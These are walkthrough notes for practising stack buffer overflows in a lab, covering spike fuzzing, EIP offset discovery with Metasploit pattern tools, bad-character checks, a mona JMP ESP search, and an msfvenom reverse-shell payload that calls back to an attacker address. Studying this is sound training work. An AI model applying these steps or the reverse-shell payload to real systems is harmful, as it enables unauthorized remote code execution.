Buffer overflow scripts to practice (walkthrough notes)
use the command "generice_send_tcp HOST PORT
" in Kali Linux
Make a file named after the service with the extension of .spk for spike.
e.g. trun.spk
run generic_send_tcp <IP> <PORT> trun.spk 0 0
if it crashes, then this is our service.
here we will use the fuzzer.py
Make sure you edit the IP and PORT
You will get a number of bytes -where the program crashed-, then you will used to generate a pattern with msf-pattern_create
in Kali.
the -l (Capital L) switch takes the number of bytes. e.g.
msf-pattern_create -l 3000
after editing the offset and firing up the offset.py
, to identify the overwritten EIP we have to take the hex for it. then we will use it with msf-pattern_offset -l <BYTES> -q <EIP's HEX>
.
the offset will come up, and that what we are gonna use to overwrite the EIP.
We will make sure here we wrote the EIP with eip_set.py
if the last bytes(of EIP) were Bs -42424242- then we overwrote the EIP successfully.
here we will try to identify which characters are bad for the shellcode (breaks the code), in order to avoid them.
run the code badchars.py
then follow the ESP in dump and see if there's any badchars (Something that doesn't belong to the hex order).
from github download mona.py and leave it at "C:\programfiles(x86)\immunityinc\immunitydebugger\pycommands"
in the little bar down the Immunity Debugger type: !mona modules
notice the falses in the security for the specific service.
locate nasm_shell in linux (this translate the instruction you write into assembly code), it is used to direct the malicious code to be executed.
type in nasm_shell: JMP ESP
then in the bar in Immunity Debugger type:
!mona find -s "\xff\xe4" -m <vuln service>
-m switch is the vulnerable module we identified earlier with !mona modules
then run module_finder.py
generate a payload with msfvenom in Kali
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.5.108 LPOST=9999 EXITFUNC=thread -f c -a x86 -b "\x00"
-f switch for format, -a switch for architechture, -b switch for bad characters.
copy the payload to shellcode.py
and fire it up.
Enjoy your shell!